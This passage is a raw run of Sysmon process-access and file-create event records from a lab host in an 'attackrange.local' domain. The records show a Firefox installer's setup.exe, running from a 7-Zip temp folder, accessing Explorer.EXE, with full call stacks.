dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\IA2Marshal.dll2021-01-18 13:59:52.349 10341000x800000000000000014871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 